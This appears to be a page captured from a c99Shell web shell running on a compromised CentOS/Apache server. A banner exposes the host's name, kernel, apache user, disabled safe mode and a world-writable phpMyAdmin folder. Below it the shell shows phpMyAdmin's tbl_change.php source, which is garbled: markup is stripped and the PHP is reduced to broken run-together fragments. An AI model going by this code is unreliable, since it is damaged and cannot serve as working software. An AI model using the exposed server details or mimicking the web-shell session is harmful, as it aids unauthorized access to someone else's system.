!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/phpMyAdmin/   drwxrwxrwx
Free 52.61 GB of 127.8 GB (41.16%)


Viewing file:     tbl_change.php (44.71 KB)      -rw-r--r--
= 40100) { $comments_map = PMA_getComments($db, $table); } } /** * Displays top menu links */ require_once('./libraries/tbl_properties_links.inc.php'); /** * Get the analysis of SHOW CREATE TABLE for this table */ $show_create_table = PMA_DBI_fetch_value( 'SHOW CREATE TABLE ' . PMA_backquote($db) . '.' . PMA_backquote($table), 0, 1 ); $analyzed_sql = PMA_SQP_analyze( PMA_SQP_parse( $show_create_table ) ); unset($show_create_table); /** * Get the list of the fields of the current table */ PMA_DBI_select_db($db); $table_def = PMA_DBI_query('SHOW FIELDS FROM ' . PMA_backquote($table) . ';', null, PMA_DBI_QUERY_STORE); if (isset($primary_key)) { if (is_array($primary_key)) { $primary_key_array = $primary_key; } else { $primary_key_array = array(0 => $primary_key); } $row = array(); $result = array(); foreach ($primary_key_array AS $rowcount => $primary_key) { $local_query = 'SELECT * FROM ' . PMA_backquote($table) . ' WHERE ' . $primary_key . ';'; $result[$rowcount] = PMA_DBI_query($local_query, null, PMA_DBI_QUERY_STORE); $row[$rowcount] = PMA_DBI_fetch_assoc($result[$rowcount]); $primary_keys[$rowcount] = $primary_key; // No row returned if (!$row[$rowcount]) { unset($row[$rowcount]); unset($primary_key_array[$rowcount]); $goto_cpy = $goto; $goto = 'tbl_properties.php?' . PMA_generate_common_url($db, $table) . '&$show_query=1' . '&sql_query=' . urlencode($local_query); if (isset($sql_query)) { $sql_query_cpy = $sql_query; unset($sql_query); } $sql_query = $local_query; PMA_showMessage($strEmptyResultSet); $goto = $goto_cpy; unset($goto_cpy); if (isset($sql_query_cpy)) { $sql_query = $sql_query_cpy; unset($sql_query_cpy); } echo "\n"; require_once('./libraries/footer.inc.php'); } // end if (no record returned) } } else { $result = PMA_DBI_query('SELECT * FROM ' . PMA_backquote($table) . ' LIMIT 1;', null, PMA_DBI_QUERY_STORE); unset($row); } // // retrieve keys into foreign fields, if any $cfgRelation = PMA_getRelationsParam(); $foreigners = ($cfgRelation['relwork'] ? 
PMA_getForeigners($db, $table) : FALSE); /** * Displays the form */ // loic1: autocomplete feature of IE kills the "onchange" event handler and it // must be replaced by the "onpropertychange" one in this case $chg_evt_handler = (PMA_USR_BROWSER_AGENT == 'IE' && PMA_USR_BROWSER_VER >= 5) ? 'onpropertychange' : 'onchange'; // Had to put the URI because when hosted on an https server, // some browsers send wrongly this form to the http server. ?>
> '; } else { $iconic_spacer = ''; } $titles['Browse'] = $iconic_spacer . '' . $strBrowseForeignValues . ''; if ($propicon == 'both') { $titles['Browse'] .= ' ' . $strBrowseForeignValues . ''; } } else { $titles['Browse'] = $strBrowseForeignValues; } // Set if we passed the first timestamp field $timestamp_seen = 0; $fields_cnt = PMA_DBI_num_rows($table_def); // Set a flag here because the 'if' would not be valid in the loop // if we set a value in some field $insert_mode = (!isset($row) ? TRUE : FALSE); if ($insert_mode) { $loop_array = array(); for ($i = 0; $i < $cfg['InsertRows']; $i++) $loop_array[] = FALSE; } else { $loop_array = $row; } while ($trow = PMA_DBI_fetch_assoc($table_def)) { $trow_table_def[] = $trow; } $tabindex = 0; $tabindex_for_function = +1000; $tabindex_for_null = +2000; $tabindex_for_value = 0; $o_rows = 0; $biggest_max_file_size = 0; foreach ($loop_array AS $vrowcount => $vrow) { if ($vrow === FALSE) { unset($vrow); } if ($insert_mode) { $jsvkey = $vrowcount; $browse_foreigners_uri = '&pk=' . $vrowcount; } else { $jsvkey = urlencode($primary_keys[$vrowcount]); $browse_foreigners_uri = '&pk=' . urlencode($primary_keys[$vrowcount]); } $vkey = '[multi_edit][' . $jsvkey . ']'; $vresult = (isset($result) && is_array($result) && isset($result[$vrowcount]) ? $result[$vrowcount] : $result); if ($insert_mode && $vrowcount > 0) { echo ''; echo '
' . "\n"; } ?> ' . $strFunction . '' . "\n"; } ?> and instead, // but it didn't worked because of the ) if ((($o_rows * $fields_cnt + $i) % 15 == 0) && ($i + $o_rows != 0)) { ?> d [Type] => datetime [Null] => YES [Key] => [Extra] => [True_Type] => datetime ) // but, look what we get if we switch to iso: (Default is NULL) // Array ( [Field] => d [Type] => datetime [Null] => YES [Key] => [Default] => [Extra] => [True_Type] => datetime ) // so I force a NULL into it (I don't think it's possible // to have an empty default value for DATETIME) // then, the "if" after this one will work if ($row_table_def['Type'] == 'datetime' && !isset($row_table_def['Default']) && isset($row_table_def['Null']) && $row_table_def['Null'] == 'YES') { $row_table_def['Default'] = null; } if ($row_table_def['Type'] == 'datetime' && (!isset($row_table_def['Default'])) && (!is_null($row_table_def['Default']))) { // INSERT case if ($insert_mode) { if (isset($vrow)) { $vrow[$rowfield] = date('Y-m-d H:i:s', time()); } else { $vrow = array($rowfield => date('Y-m-d H:i:s', time())); } } // UPDATE case with an empty and not NULL value under PHP4 elseif (empty($vrow[$rowfield]) && is_null($vrow[$rowfield])) { $vrow[$rowfield] = date('Y-m-d H:i:s', time()); } // end if... elseif... } $len = (preg_match('@float|double@', $row_table_def['Type'])) ? 100 : PMA_DBI_field_len($vresult, $i); $first_timestamp = 0; $field_name = htmlspecialchars($field); if (isset($comments_map[$field])) { $field_name = '' . $field_name . ''; } $bgcolor = ($i % 2) ? 
$cfg['BgcolorOne'] : $cfg['BgcolorTwo']; ?> '; } else { // loic1: display default values if (!isset($row_table_def['Default'])) { $row_table_def['Default'] = ''; $real_null_value = TRUE; $data = ''; } else { $data = $row_table_def['Default']; } $special_chars = htmlspecialchars($row_table_def['Default']); $backup_field = ''; } $idindex = ($o_rows * $fields_cnt) + $i + 1; $tabindex = (($idindex - 1) * 3) + 1; // The function column // ------------------- // Change by Bernard M. Piller // We don't want binary data to be destroyed // Note: from the MySQL manual: "BINARY doesn't affect how the column is // stored or retrieved" so it does not mean that the contents is // binary if ($cfg['ShowFunctionFields']) { if (($cfg['ProtectBinary'] && $is_blob && !$is_upload) || ($cfg['ProtectBinary'] == 'all' && $is_binary)) { echo ' ' . "\n"; } elseif (strstr($row_table_def['True_Type'], 'enum') || strstr($row_table_def['True_Type'], 'set')) { echo ' ' . "\n"; } else { ?> ' . "\n"; if (!(($cfg['ProtectBinary'] && $is_blob) || ($cfg['ProtectBinary'] == 'all' && $is_binary)) && $row_table_def['Null'] == 'YES') { echo ' ' . "\n"; echo ' 20) { $onclick .= '1, '; } else { $onclick .= '2, '; } } elseif (strstr($row_table_def['True_Type'], 'set')) { $onclick .= '3, '; } elseif ($foreigners && isset($foreigners[$field])) { $onclick .= '4, '; } else { $onclick .= '5, '; } $onclick .= '\'' . urlencode($field) . '\', \'' . md5($field) . '\', \'' . $vkey . '\'); this.checked = true}; return true" />' . "\n"; echo $onclick; } else { echo '  ' . "\n"; } echo ' ' . "\n"; // The value column (depends on type) // ---------------- require('./libraries/get_foreign.lib.php'); if (isset($foreign_link) && $foreign_link == true) { ?> 32000) { echo ' ' . 
"\n"; } } elseif ($type == 'enum') { $enum = PMA_getEnumSetOptions($row_table_def['Type']); $enum_cnt = count($enum); ?> // We don't want binary data destroyed elseif ($is_binary || $is_blob) { if (($cfg['ProtectBinary'] && $is_blob) || ($cfg['ProtectBinary'] == 'all' && $is_binary)) { echo "\n"; ?> '; } // end elseif ( binary or blob) else { // For char or varchar, respect the maximum length (M); for other // types (int or float), the length is not a limit on the values that // can be entered, so let's be generous (20) (we could also use the // real limits for each numeric type) // 2004-04-07, it turned out that 20 was not generous enough // for the maxlength if ($is_char) { $fieldsize = (($len > 40) ? 40 : $len); $maxlength = $len; } else { $fieldsize = 20; $maxlength = 99; } // end if... else... echo "\n"; ?>
'; } // end foreach on multi-edit ?>
 
align="center" bgcolor=""> > ' . $strBinary . '-- ="return unNullify('', '')" tabindex="" id="field__3" value="" />  
' . $strTextAreaLength . ' 20) { echo "\n"; ?> '; echo '' . "\n"; } // end for } // end else echo "\n"; ?> 40) ? 40 : $len); $maxlength = $len; } echo "\n"; ?> ="return unNullify('', '')" tabindex="" id="field__3" /> '; echo ' '; // find maximum upload size, based on field type // FIXME: with functions this is not so easy, as you can basically process any data with function like MD5 $max_field_sizes = array( 'tinyblob' => '256', 'blob' => '65536', 'mediumblob' => '16777216', 'longblob' => '4294967296'); // yeah, really $this_field_max_size = $max_upload_size; // from PHP max if ($this_field_max_size > $max_field_sizes[$type]) { $this_field_max_size = $max_field_sizes[$type]; } echo PMA_displayMaximumUploadSize($this_field_max_size) . "\n"; // do not generate here the MAX_FILE_SIZE, because we should // put only one in the form to accommodate the biggest field if ($this_field_max_size > $biggest_max_file_size) { $biggest_max_file_size = $this_field_max_size; } } if (!empty($cfg['UploadDir'])) { $files = PMA_getFileSelectOptions(PMA_userDir($cfg['UploadDir'])); if ($files === FALSE) { echo ' ' . $strError . '
' . "\n"; echo ' ' . $strWebServerUploadDirectoryError . "\n"; } elseif (!empty($files)) { echo "
\n"; echo ' ' . $strOr . '' . ' ' . $strWebServerUploadDirectory . ':
' . "\n"; echo ' ' . "\n"; } } // end if (web-server upload directory) echo '
="return unNullify('', '')" tabindex="" id="field__3" />
      
0) { echo ' ' . PMA_generateHiddenMaxFileSize($biggest_max_file_size) . "\n"; } ?>